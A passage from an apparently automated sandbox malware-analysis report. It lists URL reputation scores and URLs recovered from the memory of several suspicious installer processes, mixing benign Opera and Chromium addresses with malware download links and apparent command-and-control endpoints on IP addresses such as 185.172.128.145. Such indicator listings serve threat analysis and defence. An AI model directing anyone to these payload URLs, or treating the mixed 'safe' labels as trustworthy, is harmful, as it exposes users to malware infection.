                    C:\Users\user\AppData\Local\Temp\Opera_installer_24031207531585744560.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\Opera_installer_24031207531803244640.dll0%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://autoupdate-staging.services.ams.osa/v4/v5/netinstaller///windows/x64v2/Fetching0%URL Reputationsafe
                    https://blockchain.infoindex0%URL Reputationsafe
                    http://185.172.128.145/15f649199f40275b/freebl3.dll0%Avira URL Cloudsafe
                    https://desktop-netinstaller-sub.osp.opera.software/v1/binaryBH0%Avira URL Cloudsafe
                    http://trade-inmyus.com/index.php0%Avira URL Cloudsafe
                    https://namecloudvideo.org0%Avira URL Cloudsafe
                    http://galandskiyher5.com/downloads/toolspub1.exe100%Avira URL Cloudmalware
                    http://185.172.128.145/15f649199f40275b/freebl3.dll15%VirustotalBrowse
                    https://desktop-netinstaller-sub.osp.opera.software/v1/binaryBH0%VirustotalBrowse
                    http://trade-inmyus.com/index.php15%VirustotalBrowse
                    https://namecloudvideo.org2%VirustotalBrowse
                    http://185.172.128.145/60%Avira URL Cloudsafe
                    https://desktop-netinstaller-sub.osp.opera.software/p0%Avira URL Cloudsafe
                    http://185.172.128.145/3cd2b41cbde8fc9c.phpte3.dllm-data;0%Avira URL Cloudsafe
                    http://localhost:3001api/prefs/?product=$1&version=$2..0%Avira URL Cloudsafe
                    http://185.172.128.90/q0%Avira URL Cloudsafe
                    https://desktop-netinstaller-sub.osp.opera.software/v1/binaryera.software0%Avira URL Cloudsafe
                    https://desktop-netinstaller-sub.osp.opera.software/H0%Avira URL Cloudsafe
                    https://desktop-netinstaller-sub.osp.opera.software/p0%VirustotalBrowse
                    https://desktop-netinstaller-sub.osp.opera.software/G0%Avira URL Cloudsafe
                    http://185.172.128.145/15f649199f40275b/mozglue.dll0%Avira URL Cloudsafe
                    https://desktop-netinstaller-sub.osp.opera.software/v1/binaryera.software0%VirustotalBrowse
                    http://185.172.128.90/cpa/ping.php?substr=seven&s=ab100%Avira URL Cloudmalware
                    https://desktop-netinstaller-sub.osp.opera.software/%40%Avira URL Cloudsafe
                    http://www.innosetup.com/0%Avira URL Cloudsafe
                    http://185.172.128.145/15f649199f40275b/mozglue.dll15%VirustotalBrowse
                    http://galandskiyher5.com/downloads/toolspub1.exe19%VirustotalBrowse
                    http://185.172.128.90/=0%Avira URL Cloudsafe
                    http://185.172.128.145/3cd2b41cbde8fc9c.php0%Avira URL Cloudsafe
                    http://galandskiyher5.com/downloads/toolspub1.exe4kL100%Avira URL Cloudmalware
                    http://185.172.128.126/InstallSetup7.exe4kL0%Avira URL Cloudsafe
                    http://www.innosetup.com/1%VirustotalBrowse
                    http://185.172.128.145/3cd2b41cbde8fc9c.php18%VirustotalBrowse
                    http://185.172.128.145/15f649199f40275b/vcruntime140.dlltable0%Avira URL Cloudsafe
                    https://desktop-netinstaller-sub.osp.opera.software/%40%VirustotalBrowse
                    http://crl.ver)0%Avira URL Cloudsafe
                    https://net.geo.oper0%Avira URL Cloudsafe
                    https://gamemaker.io)0%Avira URL Cloudsafe
                    http://185.172.128.90/cpa/ping.php?substr=seven&s=ab22%VirustotalBrowse
                    https://desktop-netinstaller-sub.osp.opera.software/G0%VirustotalBrowse
                    https://namecloudvideo.org/3eef203fb515bda85f514e168abb5973.exe0%Avira URL Cloudsafe
                    http://https://_bad_pdb_file.pdb0%Avira URL Cloudsafe
                    http://185.172.128.187/0%Avira URL Cloudsafe
                    http://15.204.49.148100%Avira URL Cloudmalware
                    https://gamemaker.io/en/get.0%Avira URL Cloudsafe
                    https://namecloudvideo.org/3eef203fb515bda85f514e168abb5973.exe0%VirustotalBrowse
                    http://185.172.128.187/15%VirustotalBrowse
                    http://namecloudvideo.org0%Avira URL Cloudsafe
                    https://gamemaker.io0%Avira URL Cloudsafe
                    http://15.204.49.14818%VirustotalBrowse
                    https://gamemaker.io/en/get.0%VirustotalBrowse
                    http://185.172.128.187/ping.php?substr=seven0%Avira URL Cloudsafe
                    https://desktop-netinstaller-sub.osp.opera.software/v1/binary#=100%Avira URL Cloudmalware
                    http://185.172.128.145/15f649199f40275b/freebl3.dllyq0%Avira URL Cloudsafe
                    http://185.172.128.145/15f649199f40275b/0%Avira URL Cloudsafe
                    https://desktop-netinstaller-sub.osp.opera.software/ry0%Avira URL Cloudsafe
                    https://desktop-netinstaller-sub.osp.opera.software/H0%VirustotalBrowse
                    http://185.172.128.187/ping.php?substr=seven17%VirustotalBrowse
                    http://namecloudvideo.org2%VirustotalBrowse
                    https://desktop-netinstaller-sub.osp.opera.software/v1/binary#=1%VirustotalBrowse
                    https://gamemaker.io0%VirustotalBrowse
                    http://185.172.128.145/15f649199f40275b/freebl3.dlliq0%Avira URL Cloudsafe
                    http://185.172.128.187/ping.php?substr=sevenminuser-l1-1-00%Avira URL Cloudsafe
                    http://15.204.498:0%Avira URL Cloudsafe
                    https://desktop-netinstaller-sub.osp.opera.software/ry0%VirustotalBrowse
                    http://185.172.128.145/15f649199f40275b/sqlite3.dll0%Avira URL Cloudsafe
                    http://185.172.1280%Avira URL Cloudsafe
                    ddtwcxy.info0%Avira URL Cloudsafe
                    http://185.172.128.145/15f649199f40275b/2%VirustotalBrowse
                    https://vovsoft.com/newsletter/0%Avira URL Cloudsafe
                    http://185.172.128.145/15f649199f40275b/sqlite3.dll17%VirustotalBrowse
                    http://185.172.128.145/15f649199f40275b/sqlite3.dllCR0%Avira URL Cloudsafe
                    http://185.172.128.187/ping.php?substr=seven90%Avira URL Cloudsafe
                    https://vovsoft.com/contact/.0%Avira URL Cloudsafe
                    http://195.16.74.230/20%Avira URL Cloudsafe
                    http://185.172.128.145/15f649199f40275b/freebl3.dllyq4%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://trade-inmyus.com/index.phptrue
                    • 15%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://185.172.128.145/3cd2b41cbde8fc9c.phptrue
                    • 18%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    ddtwcxy.infotrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://galandskiyher5.com/downloads/toolspub1.exeInstallUtil.exe, 00000004.00000002.3412274842.000000000338C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003492000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000346F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036C2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003494000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000377B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032BB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003695000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036B2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003482000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 19%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    https://duckduckgo.com/chrome_newtabsyncUpd.exe, 00000016.00000002.3370913149.00000000006CA000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://duckduckgo.com/ac/?q=syncUpd.exe, 00000016.00000002.3370913149.00000000006CA000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://legal.opera.com/terms7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D2A000.00000040.00000001.01000000.00000024.sdmpfalse
                          		high
                          https://namecloudvideo.orgInstallUtil.exe, 00000004.00000002.3412274842.000000000338C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000037DB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036F8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 2%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://185.172.128.145/15f649199f40275b/freebl3.dllsyncUpd.exe, 00000016.00000002.3346089209.0000000000447000.00000040.00000001.01000000.00000012.sdmp, syncUpd.exe, 00000016.00000002.3389892346.00000000009D2000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3370913149.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3370913149.00000000006C2000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 15%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://desktop-netinstaller-sub.osp.opera.software/v1/binaryBHxzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.0000000000879000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://185.172.128.145/6syncUpd.exe, 00000016.00000002.3370913149.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://desktop-netinstaller-sub.osp.opera.software/p7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.3239538913.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E8E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://help.opera.com/latest/7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmpfalse
                            		high
                            https://policies.google.com/terms;7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D2A000.00000040.00000001.01000000.00000024.sdmpfalse
                              		high
                              https://download.opera.com/download/get/?id=65171&autoupdate=1&ni=1xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3371271590.0000000000907000.00000004.00000020.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3390066046.0000000054A8C000.00000004.00001000.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3390871165.0000000054B34000.00000004.00001000.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3390454774.0000000054AE0000.00000004.00001000.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.00000000008AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://download.opera.com/oxzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.00000000008AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://185.172.128.145/3cd2b41cbde8fc9c.phpte3.dllm-data;syncUpd.exe, 00000016.00000002.3346089209.0000000000549000.00000040.00000001.01000000.00000012.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://yip.su/redirect-InstallUtil.exe, 00000004.00000002.3412274842.00000000034A7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032AD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003402000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003660000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003755000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000377B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003685000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000341C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003299000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003695000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000376B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://localhost:3001api/prefs/?product=$1&version=$2..7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmpfalse
                                      		high
                                      https://www.opera.com/download/7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmpfalse
                                        		high
                                        http://185.172.128.90/q3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000733000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.0000000000733000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://download.opera.com/download/get/?id=65171&autoupdate=1&ni=1TxzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3390066046.0000000054A8C000.00000004.00001000.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3390110534.0000000054A9C000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          https://download.opera.com/_xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.00000000008AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://desktop-netinstaller-sub.osp.opera.software/v1/binaryera.software7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E17000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://desktop-netinstaller-sub.osp.opera.software/H7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://desktop-netinstaller-sub.osp.opera.software/GXgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3291145110.0000000000A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://download3.operacdn.com/7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.3239538913.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://185.172.128.145/15f649199f40275b/mozglue.dllsyncUpd.exe, 00000016.00000002.3346089209.0000000000447000.00000040.00000001.01000000.00000012.sdmpfalse
                                              • 15%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://turnitin.com/robot/crawlerinfo.html)cannotN82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpfalse
                                                		high
                                                https://download3.operacdn.com/u7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://185.172.128.90/cpa/ping.php?substr=seven&s=ab3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.000000000070F000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000739000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.0000000000733000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614606913.0000000003080000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610316156.0000000000738000.00000004.00000020.00020000.00000000.sdmp, 1V9g5oUcP4AKlGIaRK4CDHUH.exe, 0000001A.00000002.3386681499.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, 1V9g5oUcP4AKlGIaRK4CDHUH.exe, 0000001A.00000002.3394349460.0000000002C29000.00000004.00000020.00020000.00000000.sdmp, HjvCaWONZRgrucQ7NCpBwfHi.exe, 0000001E.00000002.3395247637.0000000002D66000.00000004.00000020.00020000.00000000.sdmp, HjvCaWONZRgrucQ7NCpBwfHi.exe, 0000001E.00000002.3390868030.000000000098E000.00000004.00000020.00020000.00000000.sdmp, NuRMT0uazLQnmOJibnohOTUR.exe, 00000022.00000002.3392643713.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, NuRMT0uazLQnmOJibnohOTUR.exe, 00000022.00000002.3389719090.000000000081E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • 22%, Virustotal, Browse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://desktop-netinstaller-sub.osp.opera.software/%47odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.3139369655.0000000000E37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInstallUtil.exe, 00000004.00000002.3412274842.0000000003261000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://iplogger.org/privacy/InstallUtil.exe, 00000004.00000002.3412274842.00000000034A7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032AD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003402000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003660000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003755000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000377B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003685000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000341C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003299000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003695000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000376B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.innosetup.com/JgqIdYSSt70LQLRUqfTzKJw8.tmp, JgqIdYSSt70LQLRUqfTzKJw8.tmp, 0000000F.00000000.2368008485.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, FNi4gQqkHn29EqnTv0rxfxe1.exe, 0000001D.00000003.2649313565.0000000001FE8000.00000004.00001000.00020000.00000000.sdmp, jUzz7ezNBFbkGCxJO9DOH9dj.exe, 00000021.00000003.2680202332.0000000002088000.00000004.00001000.00020000.00000000.sdmp, jUzz7ezNBFbkGCxJO9DOH9dj.exe, 00000021.00000003.2679800930.00000000022B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      • 1%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://download.opera.com/=xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.00000000008AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://crashpad.chromium.org/7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmpfalse
                                                          		high
                                                          https://addons.opera.com/en/extensions/details/dify-cashback/XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmpfalse
                                                            		high
                                                            https://autoupdate.geo.opera.com/geolocation/7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.0000000000857000.00000004.00000020.00020000.00000000.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmpfalse
                                                              		high
                                                              http://185.172.128.90/=3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000733000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.0000000000733000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://crashstats-collector.opera.com/collector/submit7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3370357777.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3391913141.0000000050E5C000.00000004.00001000.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3391378343.0000000050E24000.00000004.00001000.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3391349315.0000000050E14000.00000004.00001000.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000003.2965488814.0000000054A38000.00000004.00001000.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 